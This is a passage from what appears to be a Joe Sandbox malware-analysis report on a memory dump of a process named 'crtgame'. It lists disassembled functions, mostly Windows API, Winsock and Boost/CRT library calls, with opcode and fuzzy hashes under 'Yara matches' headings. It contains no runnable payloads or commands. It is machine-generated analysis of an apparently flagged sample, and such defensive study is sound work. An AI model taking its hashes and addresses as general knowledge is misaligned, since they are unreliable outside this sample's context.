                                                                            • Part of subcall function 02BC2341: GetLastError.KERNEL32 ref: 02BC237A
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1856819132-0
                                                                          • Opcode ID: e10deca538ca86a97b427acdcbf02b2265b64a6f54aaf345e885f4e37a47969f
                                                                          • Instruction ID: e2e070ff3ad58fcd47190817fae1de030630d7fea48ee903e1a34fd3931608b9
                                                                          • Opcode Fuzzy Hash: e10deca538ca86a97b427acdcbf02b2265b64a6f54aaf345e885f4e37a47969f
                                                                          • Instruction Fuzzy Hash: B8116D72D40219DBCF119FA8E8046AEFFBAFF44350F10459AE81597261EB714621EF81
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC229D
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC22B0
                                                                          • TlsGetValue.KERNEL32 ref: 02BC22E7
                                                                          • TlsSetValue.KERNEL32(?), ref: 02BC2300
                                                                          • TlsSetValue.KERNEL32(?,?,?), ref: 02BC231C
                                                                            • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2350
                                                                            • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2360
                                                                            • Part of subcall function 02BC2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BC2370
                                                                            • Part of subcall function 02BC2341: GetLastError.KERNEL32 ref: 02BC237A
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1856819132-0
                                                                          • Opcode ID: ddeaeb1d89569f63ee0e319944807b28c2afde1e94f5b3e32d2a5b38ef71fa03
                                                                          • Instruction ID: 181f6e1dda243a6b651a3242a0af26b808fe813c4a88afd05fad28e2520e72f2
                                                                          • Opcode Fuzzy Hash: ddeaeb1d89569f63ee0e319944807b28c2afde1e94f5b3e32d2a5b38ef71fa03
                                                                          • Instruction Fuzzy Hash: CA115E72D10219DBCF11DFA5E8046AEFFBAFF44350F1044AAE805A3211DB714A21DF90
                                                                          APIs
                                                                            • Part of subcall function 02BCAAEE: __EH_prolog.LIBCMT ref: 02BCAAF3
                                                                          • __CxxThrowException@8.LIBCMT ref: 02BCB6B8
                                                                            • Part of subcall function 02BD3F5A: RaiseException.KERNEL32(?,?,?,02BF0F6C,?,00000400,?,?,?,02BD359C,?,02BF0F6C,00000000,00000001), ref: 02BD3FAF
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02BF1DA4,?,00000001), ref: 02BCB6CE
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BCB6E1
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02BF1DA4,?,00000001), ref: 02BCB6F1
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BCB6FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                          • String ID:
                                                                          • API String ID: 2725315915-0
                                                                          • Opcode ID: 6b157f999739de4daeaecb0990183fce529c39521c202bd1e07a1c2b00f7ea64
                                                                          • Instruction ID: a6be7f97a4b6a254c37376610034ad91fafff5e75edc11b52b732f12f5387188
                                                                          • Opcode Fuzzy Hash: 6b157f999739de4daeaecb0990183fce529c39521c202bd1e07a1c2b00f7ea64
                                                                          • Instruction Fuzzy Hash: 66018676A40204AFDB10ABA4DC89F9BB7ADEB04369B1045A8F615D7191DB61E8158B20
                                                                          APIs
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC2432
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC2445
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02BC2454
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2469
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC2470
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 747265849-0
                                                                          • Opcode ID: 52a73e2f9021185ff4a668100dea8a181e97f9ddf2ef21ecd5a15bd13f6c34d8
                                                                          • Instruction ID: 4dddafe5bcdbf89cc7744a586e3dd5ea187d73110f0c10cda4d81ad351cd269d
                                                                          • Opcode Fuzzy Hash: 52a73e2f9021185ff4a668100dea8a181e97f9ddf2ef21ecd5a15bd13f6c34d8
                                                                          • Instruction Fuzzy Hash: 7BF03072640204BFDA10ABA0ED89FD6B72CFB44751F900865F701DB481DB71A921DBA1
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 02BC1ED2
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02BC1EEA
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02BC1EF9
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC1F0E
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC1F15
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 830998967-0
                                                                          • Opcode ID: c8ab0e43bc26426f841ffdf374a1c553551f32ce74db3745e0c16ed3146d9890
                                                                          • Instruction ID: e6b184ca69cda356b9b7b3a0963536e6eb342ad11ac5b2470b43ed62decfaa11
                                                                          • Opcode Fuzzy Hash: c8ab0e43bc26426f841ffdf374a1c553551f32ce74db3745e0c16ed3146d9890
                                                                          • Instruction Fuzzy Hash: 2BF01772641604BFDB00AFA1ED88FC6BB2DFB54391F000466F6019B842DB61A6659BA0
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?,?), ref: 02BC30C3
                                                                          • WSAStringToAddressA.WS2_32(?,00000017,00000000,?,?), ref: 02BC3102
                                                                          • _memcmp.LIBCMT ref: 02BC3141
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressErrorLastString_memcmp
                                                                          • String ID: 255.255.255.255
                                                                          • API String ID: 1618111833-2422070025
                                                                          • Opcode ID: d011d93e6035ce34ad161ebbb036b83ff0b7c1ef81c3f2e258e705232e8e80dc
                                                                          • Instruction ID: 49f31f901a2e6a7795488afbe639f8d6ca689de6d2f11750478297cce77503b2
                                                                          • Opcode Fuzzy Hash: d011d93e6035ce34ad161ebbb036b83ff0b7c1ef81c3f2e258e705232e8e80dc
                                                                          • Instruction Fuzzy Hash: 7931B571A007099FDB20AF64C8807AEB7E5EF45324F6089EDEC655B380EB719981CB91
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC1F5B
                                                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02BC1FC5
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 02BC1FD2
                                                                            • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                          • String ID: iocp
                                                                          • API String ID: 998023749-976528080
                                                                          • Opcode ID: 9baee85b42ee3575a2d930f4e870f0a4f28202326330e3712a7df3b29167bef4
                                                                          • Instruction ID: 7d04e9f4310f90815a93d9b67e2a9cfac261c208415b343e7f075b9dce2a00b8
                                                                          • Opcode Fuzzy Hash: 9baee85b42ee3575a2d930f4e870f0a4f28202326330e3712a7df3b29167bef4
                                                                          • Instruction Fuzzy Hash: 0D2104B1801B448FCB20DF6AC50055BFBF8FF94720B108A5FD4AA93A90D7B0A604CF91
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 02BD3564
                                                                            • Part of subcall function 02BD29AC: __FF_MSGBANNER.LIBCMT ref: 02BD29C3
                                                                            • Part of subcall function 02BD29AC: __NMSG_WRITE.LIBCMT ref: 02BD29CA
                                                                            • Part of subcall function 02BD29AC: RtlAllocateHeap.NTDLL(00830000,00000000,00000001), ref: 02BD29EF
                                                                          • std::exception::exception.LIBCMT ref: 02BD3582
                                                                          • __CxxThrowException@8.LIBCMT ref: 02BD3597
                                                                            • Part of subcall function 02BD3F5A: RaiseException.KERNEL32(?,?,?,02BF0F6C,?,00000400,?,?,?,02BD359C,?,02BF0F6C,00000000,00000001), ref: 02BD3FAF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 3074076210-2104205924
                                                                          • Opcode ID: a9864e15cf75652738260bbe09e910958c954913a25992bd61fb6a37877f24e0
                                                                          • Instruction ID: 51051bcbe015a593bc818eaed2307b0061e794dd6d0619df3c6a3ffa7eca5a96
                                                                          • Opcode Fuzzy Hash: a9864e15cf75652738260bbe09e910958c954913a25992bd61fb6a37877f24e0
                                                                          • Instruction Fuzzy Hash: 1DE0307150020EAADF10FE64CD009EFBBB9AB00304F4045E5A815A6592FB719654DD92
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC37B6
                                                                          • __localtime64.LIBCMT ref: 02BC37C1
                                                                            • Part of subcall function 02BD2000: __gmtime64_s.LIBCMT ref: 02BD2013
                                                                          • std::exception::exception.LIBCMT ref: 02BC37D9
                                                                            • Part of subcall function 02BD1ED3: std::exception::_Copy_str.LIBCMT ref: 02BD1EEC
                                                                            • Part of subcall function 02BC9EB1: __EH_prolog.LIBCMT ref: 02BC9EB6
                                                                            • Part of subcall function 02BC9EB1: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02BC9EC5
                                                                            • Part of subcall function 02BC9EB1: __CxxThrowException@8.LIBCMT ref: 02BC9EE4
                                                                          Strings
                                                                          • could not convert calendar time to UTC time, xrefs: 02BC37CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                          • String ID: could not convert calendar time to UTC time
                                                                          • API String ID: 1963798777-2088861013
• Opcode ID: 5f84b3a7cb0111d3b0adcdd2937b9223c1825d42cf71ba9b47f184e844194d9c
• Instruction ID: bcf7f6dd383339d640d0bdcbc9150c3c94c0eaae017cb4878833508545514aab
• Opcode Fuzzy Hash: 5f84b3a7cb0111d3b0adcdd2937b9223c1825d42cf71ba9b47f184e844194d9c
• Instruction Fuzzy Hash: EDE06DB2D0010E9BCF14EFA4D9007EEB7B9FF04304F5085E9D816A2241EB3456098F84
APIs
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BC4149), ref: 02BD0DBF
  • Part of subcall function 02BC3FDC: __EH_prolog.LIBCMT ref: 02BC3FE1
  • Part of subcall function 02BC3FDC: CreateEventA.KERNEL32(00000000,02BCA5C3,?,00000000), ref: 02BC3FF3
• CloseHandle.KERNEL32(00000000), ref: 02BD0DB4
• CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02BC4149), ref: 02BD0E00
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02BC4149), ref: 02BD0ED1
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: CloseHandle$Event$CreateH_prolog
• String ID:
• API String ID: 2825413587-0
• Opcode ID: a457c37d406e2744159b6762c7b952fbca3588e6f45d08c39ba322ef88949515
• Instruction ID: 6a051ea85ff717708c7070ce70fc0a3e16b3d5daa1f97f5723bd993576046101
• Opcode Fuzzy Hash: a457c37d406e2744159b6762c7b952fbca3588e6f45d08c39ba322ef88949515
• Instruction Fuzzy Hash: FE51B3719003458BDB11EF28C8847DABBE4EF48328F190A99EC6D97390E735E845CF91
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02BDF94B
• __isleadbyte_l.LIBCMT ref: 02BDF979
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 02BDF9A7
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,00000000,00000000,?), ref: 02BDF9DD
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 0e04a81b9141ca88b167d0826e06af69e245e4c04690733336a4fcceb580809f
• Instruction ID: f8f8175c63987601617c45a663e68d1e647ab55cc515b0ed114fcb705529d527
• Opcode Fuzzy Hash: 0e04a81b9141ca88b167d0826e06af69e245e4c04690733336a4fcceb580809f
• Instruction Fuzzy Hash: E5312031A08246BFDF218E74C884BFA7BE6FF41364F0541A8E9628B590F734D891CB50
APIs
• _malloc.LIBCMT ref: 02BDFDB0
  • Part of subcall function 02BD29AC: __FF_MSGBANNER.LIBCMT ref: 02BD29C3
  • Part of subcall function 02BD29AC: __NMSG_WRITE.LIBCMT ref: 02BD29CA
  • Part of subcall function 02BD29AC: RtlAllocateHeap.NTDLL(00830000,00000000,00000001), ref: 02BD29EF
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: AllocateHeap_malloc
• String ID:
• API String ID: 501242067-0
• Opcode ID: e3ace542f9b6117b27f18d520e4f90d334bd9beb3bd0beeeb1bdbbe0dc35b72c
• Instruction ID: fdd0b4adcc97a57479f432f7a0608310e6de90e528ab7565db1697589b2cd251
• Opcode Fuzzy Hash: e3ace542f9b6117b27f18d520e4f90d334bd9beb3bd0beeeb1bdbbe0dc35b72c
• Instruction Fuzzy Hash: 3A11A332848612EBCF312F71A8047EA7B9ADF143A1B1049B9E95F9B541FF3594508B94
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02BD1D92
• ___ascii_stricmp.LIBCMT ref: 02BD1DCA
• __tolower_l.LIBCMT ref: 02BD1DE0
  • Part of subcall function 02BD537A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02BD5388
  • Part of subcall function 02BD537A: __isctype_l.LIBCMT ref: 02BD53A9
• __tolower_l.LIBCMT ref: 02BD1DEF
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: Locale$UpdateUpdate::___tolower_l$___ascii_stricmp__isctype_l
• String ID:
• API String ID: 2995433114-0
• Opcode ID: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
• Instruction ID: 24db88934e93fb41e7cc84a2cfcb1ec4be81c91a90e0c41700e3f703ff22d50b
• Opcode Fuzzy Hash: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
• Instruction Fuzzy Hash: C111CA72914255AFD720AA7CC884BFA77BDEB01265F5406E8E42957180FB705D00C7A0
APIs
• htons.WS2_32(?), ref: 02BC3DA2
  • Part of subcall function 02BC3BD3: __EH_prolog.LIBCMT ref: 02BC3BD8
  • Part of subcall function 02BC3BD3: std::bad_exception::bad_exception.LIBCMT ref: 02BC3BED
• htonl.WS2_32(00000000), ref: 02BC3DB9
• htonl.WS2_32(00000000), ref: 02BC3DC0
• htons.WS2_32(?), ref: 02BC3DD4
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
• String ID:
• API String ID: 3882411702-0
• Opcode ID: 2936c20db4804ca5cc38d18d3c00e4875a68a78ac42b348cbbf969a8b6745758
• Instruction ID: 6c8a0475bfc90804dbebacfe6b795051ea9094f62acf88bdd8a92720c73ed8d5
• Opcode Fuzzy Hash: 2936c20db4804ca5cc38d18d3c00e4875a68a78ac42b348cbbf969a8b6745758
• Instruction Fuzzy Hash: EE118E75A10309EFCF019F64D885A5AB7B9FF09310F10C49AFC05DF205DA719A54DBA1
APIs
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000001,?,?,00000001,?,?,02BC335F,?,?,?,?,?), ref: 02BC23D0
• RtlEnterCriticalSection.NTDLL(?), ref: 02BC23DE
• InterlockedExchange.KERNEL32(00000030,00000001), ref: 02BC2401
• RtlLeaveCriticalSection.NTDLL(?), ref: 02BC2408
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
• String ID:
• API String ID: 4018804020-0
• Opcode ID: accc5951eb9d9dba4347cc080dedd580e4822757cd0c777a5534b3b586685800
• Instruction ID: cd73a8f3c13957110ab63746c472302d68f73c737143cf59949d9d571e9ec44b
• Opcode Fuzzy Hash: accc5951eb9d9dba4347cc080dedd580e4822757cd0c777a5534b3b586685800
• Instruction Fuzzy Hash: D511CE71600204EFEB209F60C984B66BBB9FF40754F2044ADFA019B141DBB1E941DBA0
APIs
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction ID: b96c431edb7ea4623c84e690397e44816f52c86bba26b3deee509fcd6184f479
• Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction Fuzzy Hash: F1014B3204014ABBCF166ED4CC41AEE3F23BF09754B488496FE6899035E336C9B1EB85
APIs
• ___BuildCatchObject.LIBCMT ref: 02BDB744
  • Part of subcall function 02BDBD5B: ___AdjustPointer.LIBCMT ref: 02BDBDA4
• _UnwindNestedFrames.LIBCMT ref: 02BDB75B
• ___FrameUnwindToState.LIBCMT ref: 02BDB76D
• CallCatchBlock.LIBCMT ref: 02BDB791
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• String ID:
• API String ID: 2633735394-0
• Opcode ID: bf7e6a2e7c15418c5902c0973dae014681d9a77571f4c99d076f4f289f483f1c
• Instruction ID: fad0c730f91ac828f52f8c6c02e1d1a376e9f1863eb2f0dc4fe176d6ce372e75
• Opcode Fuzzy Hash: bf7e6a2e7c15418c5902c0973dae014681d9a77571f4c99d076f4f289f483f1c
• Instruction Fuzzy Hash: E001E532000109BBCF12AF55CC44EEA3FBAEF48758F068055FE5866120E772E861DFA0
APIs
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC24A9
• RtlEnterCriticalSection.NTDLL(?), ref: 02BC24B8
• InterlockedExchange.KERNEL32(?,00000001), ref: 02BC24CD
• RtlLeaveCriticalSection.NTDLL(?), ref: 02BC24D4
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
• String ID:
• API String ID: 4018804020-0
• Opcode ID: a0909bf1e60bec07f8fa4e9877fde4158e29c503f84cc71bda68f6d3e4188c1a
• Instruction ID: 8fef9b642b58262962fc4911600f8aa381befab4f337380a85a69c0315ac391f
• Opcode Fuzzy Hash: a0909bf1e60bec07f8fa4e9877fde4158e29c503f84cc71bda68f6d3e4188c1a
• Instruction Fuzzy Hash: 2BF03C72640204EFDB00AF65EC84F9ABBACFF44750F004469FA04CB142DB71E5618FA1
APIs
• __EH_prolog.LIBCMT ref: 02BC2009
• RtlDeleteCriticalSection.NTDLL(?), ref: 02BC2028
• CloseHandle.KERNEL32(00000000), ref: 02BC2037
• CloseHandle.KERNEL32(00000000), ref: 02BC204E
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CriticalDeleteH_prologSection
• String ID:
• API String ID: 2456309408-0
• Opcode ID: 9fb15893c440db2caa14979de737ff1f0fa8f4f0446bbee7191ebae5bc12e1cc
• Instruction ID: 73d0770293052724c6c688db24e72541c66209901f1362a05ed39521d553e667
• Opcode Fuzzy Hash: 9fb15893c440db2caa14979de737ff1f0fa8f4f0446bbee7191ebae5bc12e1cc
• Instruction Fuzzy Hash: AA01DC31400608DBCB34AF54E808B9AFBF8EF04309F1049AEE84682990CFB4A988DF54
APIs
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: Event$H_prologSleep
• String ID:
• API String ID: 1765829285-0
• Opcode ID: 3971878ab869a89a0c61e728b79e1c4fd77043cb1bdb3ebc0134cb1bf5086f64
• Instruction ID: e3efc7ecbb0d4c6da70ca95faf2edb41f02db64911982599acba68cfd7c0837b
• Opcode Fuzzy Hash: 3971878ab869a89a0c61e728b79e1c4fd77043cb1bdb3ebc0134cb1bf5086f64
• Instruction Fuzzy Hash: ECF03036640114EFCF00DF94D888B88BBB5FF09311F1481A9F51A9B291CB759854DB51
APIs
• WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02BC7D5C,?,?,00000000), ref: 02BC9059
• getsockname.WS2_32(?,?,?), ref: 02BC906F
Strings
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: ErrorLastgetsockname
• String ID: &'
• API String ID: 566540725-655172784
• Opcode ID: ac63fc49ed2435d374a3cc27f05ecd4a697333114e49aae3961660f8d9b59ac1
• Instruction ID: 9d458da27bc8b58cb4d3dcfe4c18aaff08b1c42d17a7e9102addb26b9c26e52b
• Opcode Fuzzy Hash: ac63fc49ed2435d374a3cc27f05ecd4a697333114e49aae3961660f8d9b59ac1
• Instruction Fuzzy Hash: EB216571A00248DFDB10DF68D844ADEB7F5FF4C324F2185AAE918EB241E730E9458B51
APIs
• __EH_prolog.LIBCMT ref: 02BCC63D
  • Part of subcall function 02BCCC19: std::exception::exception.LIBCMT ref: 02BCCC48
  • Part of subcall function 02BCD3D2: __EH_prolog.LIBCMT ref: 02BCD3D7
  • Part of subcall function 02BD354C: _malloc.LIBCMT ref: 02BD3564
  • Part of subcall function 02BCCC78: __EH_prolog.LIBCMT ref: 02BCCC7D
Strings
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02BCC673
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02BCC67A
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
• API String ID: 1953324306-1943798000
• Opcode ID: bef74ad580cb916b34aed84d4045948a60aed4548ffd3f3b54719ee20a4431cb
• Instruction ID: 4aaf755ede35280d8cefbe3bfb2f290cf037e18b7762a806e5ae1f9ded2116db
• Opcode Fuzzy Hash: bef74ad580cb916b34aed84d4045948a60aed4548ffd3f3b54719ee20a4431cb
• Instruction Fuzzy Hash: F9219F71E002589BDF04EFE8D554AEEBBB5EF54704F1044DEE90AA7281DB705A44CF51
APIs
• __EH_prolog.LIBCMT ref: 02BCC732
  • Part of subcall function 02BCCCF0: std::exception::exception.LIBCMT ref: 02BCCD1D
  • Part of subcall function 02BCD509: __EH_prolog.LIBCMT ref: 02BCD50E
  • Part of subcall function 02BD354C: _malloc.LIBCMT ref: 02BD3564
  • Part of subcall function 02BCCD4D: __EH_prolog.LIBCMT ref: 02BCCD52
Strings
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02BCC76F
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02BCC768
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
• API String ID: 1953324306-412195191
